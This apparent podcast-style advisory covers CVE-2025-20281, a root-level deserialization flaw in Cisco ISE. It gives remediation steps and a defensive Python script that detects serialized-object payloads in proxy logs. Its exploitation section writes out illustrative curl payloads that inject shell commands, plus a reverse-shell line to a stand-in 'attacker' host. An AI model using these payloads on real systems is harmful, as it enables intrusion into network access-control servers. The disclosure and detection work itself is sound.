Cisco ISE: Unauthenticated deserialization leading to command injection and remote code execution in Cisco ISE API (CVE-2025-20281)
Summary
Welcome to today’s podcast. We’re spotlighting CVE-2025-20281, a critical vulnerability in Cisco’s Identity Services Engine, or ISE, that allows unauthenticated, remote attackers to execute arbitrary code as root. Disclosed in late June 2025 and updated through July, this flaw poses a serious risk to any organization running impacted versions of the software.
Product details
The affected products are Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC), releases 3.3.0 and 3.3 Patch 1 through Patch 6, and 3.4.0 and 3.4 Patch 1. Check the exact fixed patch level for each release train against Cisco's advisory rather than against this summary. These products handle policy enforcement, network access control, and device profiling, making them a critical component of many enterprise security architectures.
Vulnerability type summary
CVE-2025-20281 falls under CWE-74, Improper Neutralization of Special Elements in Output Used by a Downstream Component, the generic injection weakness. In this case, insufficient validation of user-supplied input and unsafe deserialization in a specific ISE API endpoint let an attacker supply data that, when the object is reconstructed, is passed to the host operating system as a command.
Details of the vulnerability
Researchers at the Zero Day Initiative initially reported a dangerous deserialization flaw in a specific ISE API. By sending a crafted request containing maliciously formed objects, an unauthenticated attacker can trigger remote code execution with root privileges. Security expert Bobby Gould publicly demonstrated a working exploit, showing how simple it is to chain the injection payload into system commands. No valid credentials are needed, making the exposure wide open to Internet-facing or improperly segmented ISE deployments.
Conclusion
This vulnerability demands immediate action. Cisco has released patches for all affected versions, so administrators should upgrade to the latest ISE release without delay. In addition, we recommend restricting API access to trusted networks, applying strong segmentation, and monitoring logs for unusual deserialization errors. That wraps up our coverage of CVE-2025-20281. Stay safe, stay patched, and join us next time for more security insights.
Watch the full video on YouTube: CVE-2025-20281
Remediation and exploitation details
This chain involves the following actors:
- Attacker: Unauthenticated remote adversary seeking remote code execution
- Security Researcher (ZDI / Bobby Gould): Proof-of-concept developer and demonstrator
The following systems are involved:
- Cisco Identity Services Engine (ISE) (Centralized network access control and policy management): Primary vulnerable application server
- Cisco ISE Passive Identity Connector (ISE-PIC) (Standalone passive-identity edition built on the same ISE code base): Shares the vulnerable API
- Underlying Operating System (Host environment for Cisco ISE services): Execution environment for injected commands
Attack entry point
- Unauthenticated ISE API endpoint: A REST API method in ISE/ISE-PIC that deserializes user-supplied input without proper validation, exposed on default management ports
Remediation actions
- Upgrade ISE and ISE-PIC to a fixed release named in Cisco's advisory (cisco-sa-ise-unauth-rce-ZAd2GnJ6); upgrading is the fix, and the network measures below only reduce exposure
- Restrict reachability of the ISE API ports (9060 is the port used in the exploitation example) to trusted management networks, and segment ISE away from user and Internet-facing zones
- Monitor API access logs for unauthenticated requests to API endpoints from unexpected sources, and application logs for deserialization errors
Exploitation actions
Embed shell commands in a serialized object so they run while the object is reconstructed. The PHP-style object notation, the class name "Exploit" and the endpoint path below are illustrative placeholders, not the real ISE API path; the string lengths in the notation must match the enclosed text or the payload does not parse
- payload = { "data": "O:7:\"Exploit\":1:{s:3:\"cmd\";s:13:\"/bin/sh -c id\";}" }
Unauthenticated remote code execution via API deserialization
- curl -k -X POST https://ise.example.local:9060/api/v1/vulnerableEndpoint \
      -H "Content-Type: application/json" \
      -d '{"data":"O:7:\"Exploit\":1:{s:3:\"cmd\";s:17:\"/bin/sh -c whoami\";}"}'
Command injection during object reconstruction in the API layer
- Illustrative result: whoami returns root, confirming the injected command runs with root privileges
Spawn an interactive reverse shell (the full request is elided here)
- curl -k -X POST https://ise.local:9060/... -d '{"data":".../bin/sh -i >& /dev/tcp/attacker/4444 0>&1"}'
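The monitoring recommended in the Conclusion and under Remediation actions, as an added example that is not part of the original page and not Cisco's code: a small Python triage script over access-log lines of the kind a reverse proxy or WAF placed in front of the API port could emit. The log format, the trusted subnet 10.10.0.0/24, the request bodies and every log line are constructed for illustration, as is the /api/v1/vulnerableEndpoint path carried over from the exploitation steps above. It flags unauthenticated API requests from outside the trusted network and POST bodies carrying serialized-object markers; it goes beyond the page in also matching the Java object-stream header (hex aced0005, base64 rO0AB) alongside the PHP-style O:n:"Class":m:{ form shown above, in case the real payload is a Java stream rather than the notation used here.

```python
"""Triage access-log lines for the ISE API abuse pattern described on this page.

Added example, not Cisco's code. The log format (CLF-like with a trailing quoted
request body), the trusted subnet, the endpoint path and all sample lines are
constructed assumptions for illustration.
"""
import ipaddress
import re
from dataclasses import dataclass, field

# Hypothetical management subnet: the only network that should reach the API.
TRUSTED_NETS = [ipaddress.ip_network("10.10.0.0/24")]

# Markers of a serialized object in a request body:
#   aced0005       Java object-stream magic + version, hex-encoded
#   rO0AB          the same four bytes base64-encoded
#   O:n:"Cls":m:{  PHP-style object notation, the form used in the payload above
SERIALIZED_MARKERS = (
    re.compile(r"aced0005", re.IGNORECASE),
    re.compile(r"rO0AB"),
    re.compile(r'O:\d+:\\?"[^"\\]+\\?":\d+:\{'),
)

# Constructed line format: <src> <user> [<ts>] "<method> <path> HTTP/x" <status> "<body>"
LOG_RE = re.compile(
    r'^(?P<src>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
    r'"(?P<body>.*)"$'
)


@dataclass
class Finding:
    src: str
    path: str
    reasons: list = field(default_factory=list)


def is_trusted(src: str) -> bool:
    """True if src parses as an IP address inside a trusted management net."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_NETS)


def triage_line(line: str):
    """Return a Finding for a suspicious API request, else None."""
    m = LOG_RE.match(line)
    if not m or not m["path"].startswith("/api/"):
        return None
    reasons = []
    # "-" in the user field means the request carried no authenticated identity.
    if m["user"] == "-" and not is_trusted(m["src"]):
        reasons.append("unauthenticated API request from untrusted source")
    if m["method"] == "POST" and any(p.search(m["body"]) for p in SERIALIZED_MARKERS):
        reasons.append("request body contains a serialized-object marker")
    return Finding(m["src"], m["path"], reasons) if reasons else None


def triage(lines):
    """Run triage_line over every line, keeping only the findings."""
    return [f for f in map(triage_line, lines) if f is not None]


# Constructed sample log (not real ISE output); bodies are logged verbatim.
SAMPLE_LOG = [
    # trusted admin, non-API path: ignored
    r'10.10.0.5 admin [25/Jun/2025:10:02:51 +0000] "GET /admin/login.jsp HTTP/1.1" 200 ""',
    # unauthenticated, untrusted source, PHP-style serialized payload: two reasons
    r'203.0.113.7 - [25/Jun/2025:10:14:03 +0000] "POST /api/v1/vulnerableEndpoint HTTP/1.1" 500 "{"data":"O:7:\"Exploit\":1:{s:3:\"cmd\";s:13:\"/bin/sh -c id\";}"}"',
    # trusted and authenticated, but the body is a base64 Java object stream: one reason
    r'10.10.0.9 admin [25/Jun/2025:10:20:11 +0000] "POST /api/v1/vulnerableEndpoint HTTP/1.1" 200 "{"data":"rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=="}"',
    # unauthenticated GET from outside the trusted net: one reason
    r'198.51.100.4 - [25/Jun/2025:10:31:40 +0000] "GET /api/v1/deployment/node HTTP/1.1" 401 ""',
    # malformed line: skipped
    "garbage line without structure",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f.src} {f.path}: {'; '.join(f.reasons)}")
```

Feed it real proxy logs by replacing SAMPLE_LOG and adjusting LOG_RE to the proxy's format; the marker list is the part worth keeping, since it catches both the notation used on this page and a raw Java object stream regardless of which endpoint the request targets.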
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-unauth-rce-ZAd2GnJ6
- [2025-07-25] ZDI reported a deserialization vulnerability in Cisco ISE API leading to command injection and remote code execution.
- [2025-07-28] Security researcher Bobby Gould demonstrates exploit for critical Cisco ISE vulnerability CVE-2025-20281.